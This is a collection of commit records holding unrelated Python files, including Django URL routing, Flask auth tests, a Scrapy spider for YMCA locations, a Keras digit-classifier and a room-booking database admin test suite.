new_collected = CollectedData.objects.create(targeted="12",achieved="20", description="somevaluecollected", indicator=get_indicator)
new_collected.save()
def test_indicator_exists(self):
"""Check for Indicator object"""
get_indicator = Indicator.objects.get(name="testindicator")
self.assertEqual(Indicator.objects.filter(id=get_indicator.id).count(), 1)
def test_collected_exists(self):
"""Check for CollectedData object"""
get_collected = CollectedData.objects.get(description="somevaluecollected")
self.assertEqual(CollectedData.objects.filter(id=get_collected.id).count(), 1)
| Python | 0.000008 |
2db51d6c117bbe0555ddffe34f52679685c68fbb | update url | indicators/urls.py | indicators/urls.py | from django.conf.urls import patterns, include, url
from .views import CollectedDataList, CollectedDataCreate, CollectedDataUpdate, CollectedDataDelete, IndicatorCreate, IndicatorDelete, IndicatorUpdate,\
IndicatorList, IndicatorExport
urlpatterns = patterns('',
###INDICATOR PLANING TOOL
#Home
url(r'^home/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
#Indicator Report
url(r'^report/(?P<program>\w+)/$', 'indicators.views.indicator_report', name='indicator_report'),
url(r'^program_report/(?P<program>\w+)/$', 'indicators.views.programIndicatorReport', name='programIndicatorReport'),
#Indicator Form
url(r'^indicator_list/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
url(r'^indicator_create/(?P<id>\w+)/$', 'indicators.views.indicator_create', name='indicator_create'),
url(r'^indicator_add/(?P<id>\w+)/$', IndicatorCreate.as_view(), name='indicator_add'),
url(r'^indicator_update/(?P<pk>\w+)/$', IndicatorUpdate.as_view(), name='indicator_update'),
url(r'^indicator_delete/(?P<pk>\w+)/$', IndicatorDelete.as_view(), name='indicator_delete'),
#Collected Data List
url(r'^collecteddata/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/(?P<agreement>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata_add/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataCreate.as_view(), name='collecteddata_add'),
url(r'^collecteddata_import/$', 'indicators.views.collecteddata_import', name='collecteddata_import'),
url(r'^collecteddata_update/(?P<pk>\w+)/$', CollectedDataUpdate.as_view(), name='collecteddata_update'),
url(r'^collecteddata_delete/(?P<pk>\w+)/$', CollectedDataDelete.as_view(), name='collecteddata_delete'),
url(r'^collecteddata_export/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
#Indicator Data Report
url(r'^data/(?P<id>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/map/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/graph/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/table/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^export/(?P<program>\w+)/$', IndicatorExport.as_view(), name='indicator_export'),
url(r'^export_data/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataExport.as_view(), name='indicator_data_export'),
#ajax calls
url(r'^service/(?P<service>[-\w]+)/service_json/', 'indicators.views.service_json', name='service_json'),
url(r'^collected_data_table/(?P<indicator>[-\w]+)/(?P<program>[-\w]+)/', 'indicators.views.collected_data_json', name='collected_data_json'),
url(r'^program_indicators/(?P<program>[-\w]+)/', 'indicators.views.program_indicators_json', name='program_indicators_json'),
) | from django.conf.urls import patterns, include, url
from .views import CollectedDataList, CollectedDataCreate, CollectedDataUpdate, CollectedDataDelete, IndicatorCreate, IndicatorDelete, IndicatorUpdate,\
IndicatorList, IndicatorExport, CollectedDataExport
urlpatterns = patterns('',
###INDICATOR PLANING TOOL
#Home
url(r'^home/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
#Indicator Report
url(r'^report/(?P<program>\w+)/$', 'indicators.views.indicator_report', name='indicator_report'),
url(r'^program_report/(?P<program>\w+)/$', 'indicators.views.programIndicatorReport', name='programIndicatorReport'),
#Indicator Form
url(r'^indicator_list/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
url(r'^indicator_create/(?P<id>\w+)/$', 'indicators.views.indicator_create', name='indicator_create'),
url(r'^indicator_add/(?P<id>\w+)/$', IndicatorCreate.as_view(), name='indicator_add'),
url(r'^indicator_update/(?P<pk>\w+)/$', IndicatorUpdate.as_view(), name='indicator_update'),
url(r'^indicator_delete/(?P<pk>\w+)/$', IndicatorDelete.as_view(), name='indicator_delete'),
#Collected Data List
url(r'^collecteddata/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/(?P<agreement>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata_add/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataCreate.as_view(), name='collecteddata_add'),
url(r'^collecteddata_import/$', 'indicators.views.collecteddata_import', name='collecteddata_import'),
url(r'^collecteddata_update/(?P<pk>\w+)/$', CollectedDataUpdate.as_view(), name='collecteddata_update'),
url(r'^collecteddata_delete/(?P<pk>\w+)/$', CollectedDataDelete.as_view(), name='collecteddata_delete'),
url(r'^collecteddata_export/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
#Indicator Data Report
url(r'^data/(?P<id>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/map/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/graph/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/table/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^export/(?P<program>\w+)/$', IndicatorExport.as_view(), name='indicator_export'),
url(r'^export_data/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataExport.as_view(), name='indicator_data_export'),
#ajax calls
url(r'^service/(?P<service>[-\w]+)/service_json/', 'indicators.views.service_json', name='service_json'),
url(r'^collected_data_table/(?P<indicator>[-\w]+)/(?P<program>[-\w]+)/', 'indicators.views.collected_data_json', name='collected_data_json'),
url(r'^program_indicators/(?P<program>[-\w]+)/', 'indicators.views.program_indicators_json', name='program_indicators_json'),
) | Python | 0.000001 |
7d128f2386fd3bbcbff1a407018f9ab9ed580810 | Add tests for path join | tests/test_path.py | tests/test_path.py | from gypsy.path import _join
def test_join():
assert _join('s3://', 'bucket', 'prefix') == 's3://bucket/prefix'
assert _join('s3://bucket', 'prefix') == 's3://bucket/prefix'
assert _join('bucket', 'prefix') == 'bucket/prefix'
| Python | 0 | |
7589e8c746d264b4e8ebcdcf932ddd9620d419a3 | Implement user tests | tests/test_user.py | tests/test_user.py | import unittest
import json
from app import create_app, db
class UserTest(unittest.TestCase):
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
# binds the app to the current context
with self.app.app_context():
# create all tables
db.create_all()
self.user = {"username": "nerd",
"password": "nerdy",
"email": "nerd@tests.com "
}
def test_registration_successful(self):
"""Test successful user registration."""
response = self.client.post("auth/register",
data=json.dumps(self.user),
content_type="application/json")
result = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result["message"],
'User registration successful.')
self.assertEqual(result['username'],
self.user['username'])
def test_duplicate_user_registration(self):
"""Test registered user registration."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(res.status_code, 409)
result = json.loads(res.data)
self.assertEqual(result['message'],
"User with the username already exists.")
def test_login_successful(self):
"""Test successful user login."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 200)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Login successful.")
def test_unauthorised_login_attempt(self):
"""Test unauthorised login attempt."""
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 401)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Invalid username/password.")
def test_incomplete_login_credentials(self):
"""Test partial issue of login credentials"""
res = self.client().post('/auth/login/',
data=json.dumps({"username": "nerd"}),
content_type="application/json")
result = json.loads(res.data)
self.assertEqual(result['error'],
"missing data in request.")
def tearDown(self):
"""teardown all initialized variables."""
with self.app.app_context():
# drop all tables
db.session.remove()
db.drop_all()
if __name__ == '__main__':
unittest.main()
| Python | 0.000048 | |
af2654df47b8b7ea60d78fd7f692e911c2d3a82c | allow oveerride of font used | tests/text_test.py | tests/text_test.py | import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
if len(sys.argv) == 2:
filename = sys.argv[1]
else:
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| Python | 0 |
73e3d7140a6bf24375e08498f754eeac827ca9a1 | Add spider for YMCA | locations/spiders/ymca.py | locations/spiders/ymca.py | # -*- coding: utf-8 -*-
from datetime import datetime
import json
import re
from urllib.parse import urlencode
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
SINGLE_POINT_STATES = [
("0,64.0685,-152.2782,AK"),
("1,20.6538883744,-157.8631750471,HI"),
]
HUNDRED_MILES_STATES = {"MT", "WY", "SD", "ND", "NE", "NV", "AZ", "NM", "UT", "ID"}
TWENTYFIVE_MILES_STATES = {"MD", "OH", "FL", "IL", "IA", "WI", "MN", "RI", "MA", "NH",
"SC", "NC", "NJ", "WA", "CA", "PA", "NY"}
class YmcaSpider(scrapy.Spider):
name = "ymca"
allowed_domains = ["ymca.net"]
download_delay = 0.5
def start_requests(self):
url = 'https://www.ymca.net/find-your-y/?'
for point in SINGLE_POINT_STATES:
_, lat, lon, state = point.strip().split(',')
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
with open('./locations/searchable_points/us_centroids_100mile_radius_state.csv') as points:
next(points)
for point in points:
_, lat, lon, state = point.strip().split(',')
if state in HUNDRED_MILES_STATES:
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
with open('./locations/searchable_points/us_centroids_25mile_radius_state.csv') as points:
next(points)
for point in points:
_, lat, lon, state = point.strip().split(',')
if state in TWENTYFIVE_MILES_STATES:
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
with open('./locations/searchable_points/us_centroids_50mile_radius_state.csv') as points:
next(points)
for point in points:
_, lat, lon, state = point.strip().split(',')
if state not in HUNDRED_MILES_STATES.union(TWENTYFIVE_MILES_STATES).union({"AK", "HI"}):
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
def parse_hours(self, hours):
opening_hours = OpeningHours()
for hour in hours:
hour = hour.strip()
if hour == "Hours of Operation:":
continue
try:
day, open_time, close_time = re.search(r'(.*?):\s(.*?)\s-\s(.*?)$', hour).groups()
except AttributeError: # closed
continue
open_time = open_time.replace('.', '')
close_time = close_time.replace('.', '')
open_time = (datetime.strptime(open_time, '%I:%M %p')
if ":" in open_time
else datetime.strptime(open_time, '%I %p')).strftime('%H:%M')
close_time = (datetime.strptime(close_time, '%I:%M %p')
if ":" in close_time
else datetime.strptime(close_time, '%I %p')).strftime('%H:%M')
opening_hours.add_range(day=day[:2],
open_time=open_time,
close_time=close_time,
time_format='%H:%M')
return opening_hours.as_opening_hours()
def parse_location(self, response):
p = response.xpath('//main//p[1]/text()').extract()
p = [x.strip() for x in p if x.strip()]
phone = p.pop(-1) # last line is phone number
city, state, postcode = re.search(r'(.*?), ([A-Z]{2}) ([\d-]+)$', p.pop(-1)).groups() # next to last line is city/state/zip
address = " ".join(p) # every thing left is street address
properties = {
'ref': re.search(r'.+/?id=(.+)', response.url).group(1),
'name': response.xpath('//main//h1/text()').extract_first(),
'addr_full': address,
'city': city,
'state': state,
'postcode': postcode,
'country': 'US',
'lat': float(response.xpath('//div[@id="y-profile-position"]/@data-latitude').extract_first()),
'lon': float(response.xpath('//div[@id="y-profile-position"]/@data-longitude').extract_first()),
'phone': phone.replace("Phone: ", ""),
'website': response.xpath('//div[@id="y-profile-position"]/@data-url').extract_first()
}
properties['opening_hours'] = self.parse_hours(response.xpath('//main//p[contains(text(), "Hours")]/text()').extract())
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//main//ul[not(contains(@class, "ymca-pagination"))]/li/h3//a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
| Python | 0.000003 | |
4e5a1a799bea020c145e544de255e3322ecc5aed | add kerasCNN | kerasCNN.py | kerasCNN.py | from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import PReLU
from keras.utils import np_utils, generic_utils
from keras.optimizers import Adam, SGD, Optimizer
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, log_loss
from sklearn.ensemble import BaggingClassifier
from sklearn.cross_validation import StratifiedKFold, KFold
path = './'
batch_size = 256
nb_classes = 10
img_rows, img_cols = 28, 28 # input image dimensions
nb_filters = 32 # number of convolutional filters to use
nb_pool = 2 # 2 size of pooling area for max pooling
nb_conv = 3 # 3 convolution kernel size
# the data, shuffled and split between tran and test sets
train = pd.read_csv(path+'train.csv')
labels = train['label']
del train['label']
test = pd.read_csv(path+'test.csv')
train = train.values
train = train.reshape(train.shape[0], 1, img_rows, img_cols)
test = test.values
test = test.reshape(test.shape[0], 1, img_rows, img_cols)
train = train.astype("float32")
test = test.astype("float32")
train /= 255
test /= 255
print('train shape:', train.shape)
print(train.shape[0], 'train samples')
print(test.shape[0], 'test samples')
label = np_utils.to_categorical(labels, nb_classes)
# convert class vectors to binary class matrices
N = train.shape[0]
trainId = np.array(range(N))
submissionTr = pd.DataFrame(index=trainId,columns=np.array(range(10)))
nfold=5
RND = np.random.randint(0,10000,nfold)
pred = np.zeros((test.shape[0],10))
score = np.zeros(nfold)
i=0
skf = StratifiedKFold(labels, nfold, random_state=1337)
for tr, te in skf:
X_train, X_valid, y_train, y_valid = train[tr], train[te], label[tr], label[te]
predTr = np.zeros((X_valid.shape[0],10))
n_bag=5
for j in range(n_bag):
print('nfold: ',i,'/',nfold, ' n_bag: ',j,' /',n_bag)
print("Building model...")
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='full',
input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
earlystopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1)
checkpointer = ModelCheckpoint(filepath=path+"weights.hdf5", verbose=0, save_best_only=True)
model.compile(loss='categorical_crossentropy', optimizer='adadelta')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1000, show_accuracy=True,
verbose=2, validation_data=(X_valid,y_valid), callbacks=[earlystopping,checkpointer])
model.load_weights(path+"weights.hdf5")
print("Generating submission...")
pred += model.predict_proba(test)
predTr += model.predict_proba(X_valid)
predTr /= n_bag
submissionTr.iloc[te] = predTr
score[i]= log_loss(y_valid,predTr,eps=1e-15, normalize=True)
print(score[i])
i+=1
pred /= (nfold * n_bag)
print("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score)))
print(confusion_matrix(labels, submissionTr.idxmax(axis=1)))
pd.DataFrame(pred).to_csv(path+"kerasCNN.csv",index_label='ImageId')
Label=pd.DataFrame(pred).idxmax(axis=1)
submission = pd.DataFrame({'ImageId': np.array(range(test.shape[0]))+1, 'Label': Label})
submission.to_csv(path+"kerasCNN_submission.csv",index=False)
print(log_loss(labels,submissionTr.values,eps=1e-15, normalize=True))
submissionTr.to_csv(path+"kerasCNN_stack.csv",index_label='ImageId')
# nfold 5, bagging 5: 0.020957301 + 0.00140977765 , Public LB: 0.99371
# batch_size 256: 0.0203983009777 + 0.00172547876286, Public LB: 0.99414
| Python | 0.999712 | |
7336cc3c89727383c7a9cbbf564f6cfce7f198f9 | add similiarty3.py | app/find_similarity3.py | app/find_similarity3.py | import sys
import string
import requests
import json
import pymysql
import numpy as np
import pandas as pd
from operator import itemgetter
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.decomposition import PCA, RandomizedPCA, TruncatedSVD
from sklearn.preprocessing import Normalizer
def find_companies(investorname):
investorname = np.int(investorname)
rmatrix= np.loadtxt(open("investorcompanyPCA.csv"),delimiter=",")
investor_id = np.loadtxt(open("investorIDorder.csv"),delimiter=",")
investor_id = investor_id.astype(int)
count=0
score = []
target=[]
for row in investor_id:
if row == investorname:
target = rmatrix[count]
break
count += 1
counter2 = 0
for row in rmatrix:
#score.append([cosine_similarity(target,row).tolist()[0][0], investor_id[counter2]])
score.append({u'similarity': cosine_similarity(target,row).tolist()[0][0], u'investor_id': investor_id[counter2]})
counter2 += 1
#score = sorted(score,reverse=True)
con = pymysql.connect(host='localhost', user='root', passwd='****')
cur = con.cursor()
cur.execute('''USE Venturenetwork16;''')
current_query='''SELECT startupID FROM Investor_comp'''
company_total = pd.io.sql.frame_query(current_query, con)
company_total = list(company_total['startupID'])
similarcomp=[]
current_query='''SELECT * FROM Investor_comp'''
rows = pd.io.sql.frame_query(current_query, con)
df = pd.Series(list(rows['startupID']),list(rows['investor_id']))
score = sorted(score,key=itemgetter('similarity'),reverse=True)
similarcomp = []
for investor_row in score[1:20]:
for company in list(df[investor_row['investor_id']]):
similarcomp.append([company, investor_row['similarity']])
companyid = [ row[0] for row in similarcomp ]
companysim = [ row[1] for row in similarcomp ]
uniquecompID = list(set(companyid))
uniquesimcomp = []
for company in uniquecompID:
compscore = 0
for company2 in similarcomp:
if company == company2[0] and company not in list(df[investorname]):
compscore += company2[1]
uniquesimcomp.append([compscore, company])
return sorted(uniquesimcomp, reverse=True)[0:40], score
if __name__ == "__main__":
[uniquesimcomp,score] = find_companies(sys.argv[1])
print [uniquesimcomp,score]
| Python | 0 | |
08988d19c712ad4604f0acced71a069c7c20067a | Add kv store for file storage | zou/app/stores/file_store.py | zou/app/stores/file_store.py | import flask_fs as fs
from zou.app import app
pictures = fs.Storage("pictures", overwrite=True)
movies = fs.Storage("movies", overwrite=True)
pictures.configure(app)
movies.configure(app)
def make_key(prefix, id):
return "%s-%s" % (prefix, id)
def add_picture(prefix, id, path):
key = make_key(prefix, id)
with open(path, 'rb') as fd:
return pictures.write(key, fd)
def get_picture(prefix, id):
key = make_key(prefix, id)
return pictures.read(key)
def open_picture(prefix, id):
key = make_key(prefix, id)
return pictures.open(key, 'rb')
def exists_picture(prefix, id):
key = make_key(prefix, id)
return pictures.exists(key)
def remove_picture(prefix, id):
key = make_key(prefix, id)
pictures.delete(key)
def add_movie(prefix, id, content):
key = make_key(prefix, id)
return movies.write(key, content)
def get_movie(prefix, id):
key = make_key(prefix, id)
return movies.read(key)
def open_movie(prefix, id):
key = make_key(prefix, id)
return movies.open(key, 'rb')
def exists_movie(prefix, id):
key = make_key(prefix, id)
return movies.exists(key)
def remove_movie(prefix, id):
key = make_key(prefix, id)
movies.delete(key)
| Python | 0 | |
56c27d56ca16f6659a478af0b6529291b1140636 | Create find-peak-element-ii.py | Python/find-peak-element-ii.py | Python/find-peak-element-ii.py | # Time: O(max(m, n))
# Space: O(1)
class Solution:
#@param A: An list of list integer
#@return: The index of position is a list of integer, for example [2,2]
def findPeakII(self, A):
upper, down = 0, len(A) - 1
left, right = 0, len(A[0]) - 1
while upper < down and left < right:
height = down - upper + 1
width = right - left + 1
# T(m, n) = T(m / 2, n / 2) + O(m) + O(n / 2) = O(max(m, n))
if width > height: # Vertical split.
mid_j = left + (right - left) / 2
left_max, central_max, right_max = 0, 0, 0
max_i, max_j = -1, -1
for i in xrange(upper+1, down):
if A[i][mid_j] > central_max:
max_i, max_j = i, mid_j
central_max = A[i][mid_j]
left_max = max(left_max, A[i][mid_j - 1])
right_max = max(right_max, A[i][mid_j + 1])
if left_max > central_max and left_max > right_max: # Find left.
right = mid_j
elif right_max > central_max and right_max > left_max: # Find right.
left = mid_j
else: # Find one peak.
return [max_i, max_j]
else: # Horizontal split.
mid_i = upper + (down - upper) / 2
upper_max, central_max, down_max = 0, 0, 0
max_i, max_j = 0, 0
for j in xrange(left + 1, right):
if A[mid_i][j] > central_max:
max_i, max_j = mid_i, j
central_max = A[mid_i][j]
upper_max = max(upper_max, A[mid_i - 1][j])
down_max = max(down_max, A[mid_i + 1][j])
if upper_max > central_max and upper_max > down_max: # Find upper.
down = mid_i
elif down_max > central_max and down_max > upper_max: # Find down.
upper = mid_i
else: # Find one peak.
return [max_i, max_j]
return [-1, -1] # Not found.
| Python | 0.00137 | |
49882e51faa26dbaa17a5f3510f0ba215b317dac | add simple test | test/simple.py | test/simple.py | import matplotlib.pyplot as plt
import numpy
numpy.random.seed(0)
N = 1000
Ne = N * 0.8
Ni = N - Ne
a = numpy.concatenate((
0.02 * numpy.ones((Ne, 1)),
0.1 * numpy.ones((Ni, 1))
))
b = numpy.concatenate((
0.2 * numpy.ones((Ne, 1)),
0.2 * numpy.ones((Ni, 1))
))
c = numpy.concatenate((
-65 * numpy.ones((Ne, 1)),
-65 * numpy.ones((Ni, 1))
))
d = numpy.concatenate((
8 * numpy.ones((Ne, 1)),
2 * numpy.ones((Ni, 1))
))
S = numpy.concatenate((
0.5 * numpy.random.rand(N, Ne),
-1.0 * numpy.random.rand(N, Ni)), axis=1)
v = -65 * numpy.ones((N, 1))
u = numpy.multiply(b, v)
firings = [[], []]
for t in range(1000):
I = 13 * (numpy.random.rand(N, 1) - 0.5)
fired = numpy.argwhere(v >= 30)[:,0]
if fired.size > 0:
for firing in fired:
firings[0].append(t)
firings[1].append(firing)
v[fired] = c[fired]
u[fired] += d[fired]
I += numpy.sum(S[:, fired], 1).reshape((N, 1))
v = v + (0.04 * numpy.square(v) + 5 * v + 140 - u + I)
u = u + numpy.multiply(a, numpy.multiply(b, v) - u)
plt.scatter(
firings[0],
firings[1],
color="black",
marker=".")
plt.show()
| Python | 0.000011 | |
32c5a681c7dd498204d38d5d1152aa7f67e09069 | Add feedback entries to the Admin panel | taiga/feedback/admin.py | taiga/feedback/admin.py | # Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from . import models
class FeedbackEntryAdmin(admin.ModelAdmin):
list_display = ['created_date', 'full_name', 'email' ]
list_display_links = list_display
list_filter = ['created_date',]
date_hierarchy = "created_date"
ordering = ("-created_date", "id")
search_fields = ("full_name", "email", "id")
admin.site.register(models.FeedbackEntry, FeedbackEntryAdmin)
| Python | 0 | |
bcc6639b2a60542b165c38bcff4211d2ed7db816 | add unit tests for dbadmin | testDBAdmin.py | testDBAdmin.py | import unittest
import dbadmin
from unittest.mock import call
from unittest.mock import patch
from unittest.mock import PropertyMock
class TestDBAdmin(unittest.TestCase):
def testHumanizeTime(self):
self.assertEqual(dbadmin.humanize_time(0), '00:00')
self.assertEqual(dbadmin.humanize_time(100), '01:00')
self.assertEqual(dbadmin.humanize_time(525), '05:15')
self.assertEqual(dbadmin.humanize_time(1050), '10:30')
self.assertEqual(dbadmin.humanize_time(1200), '12:00')
self.assertEqual(dbadmin.humanize_time(2275), '22:45')
self.assertEqual(dbadmin.humanize_time(2400), '24:00')
def testDehumanizeTime(self):
self.assertEqual(dbadmin.dehumanize_time('00:00'), 0)
self.assertEqual(dbadmin.dehumanize_time('01:00'), 100)
self.assertEqual(dbadmin.dehumanize_time('05:15'), 525)
self.assertEqual(dbadmin.dehumanize_time('08:50'), 900)
self.assertEqual(dbadmin.dehumanize_time('10:30'), 1050)
self.assertEqual(dbadmin.dehumanize_time('12:00'), 1200)
self.assertEqual(dbadmin.dehumanize_time('22:45'), 2275)
self.assertEqual(dbadmin.dehumanize_time('24:00'), 2400)
def testConsolidateTimes(self):
self.assertListEqual(dbadmin.consolidate_times([]), [])
self.assertListEqual(dbadmin.consolidate_times([(0, 25),
(25, 50),
(50, 75),
(75, 100)]),
[(0, 100)])
self.assertListEqual(dbadmin.consolidate_times([(0, 25),
(50, 75),
(100, 125)]),
[(0, 25), (50, 75), (100, 125)])
self.assertListEqual(dbadmin.consolidate_times([(0,25),
(25, 50),
(75,100),
(100, 125)]),
[(0, 50), (75, 125)])
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testAddRoom(self, *unused_args):
dba = dbadmin.DBAdmin()
dba.add_room('MS160')
dba.c.executemany.assert_called()
dba.conn.commit.assert_called_once()
@patch('dbadmin.DBAdmin.add_room')
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testAddTime(self, *unused_args):
dba = dbadmin.DBAdmin()
dba.add_time('MS160', 'M', '10:00', '10:50')
calls = [call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1000'),
call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1025'),
call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1050'),
call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1075')]
dba.c.execute.assert_has_calls(calls)
dba.add_room.assert_not_called()
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testCheckRoom(self, *unused_args):
dba = dbadmin.DBAdmin()
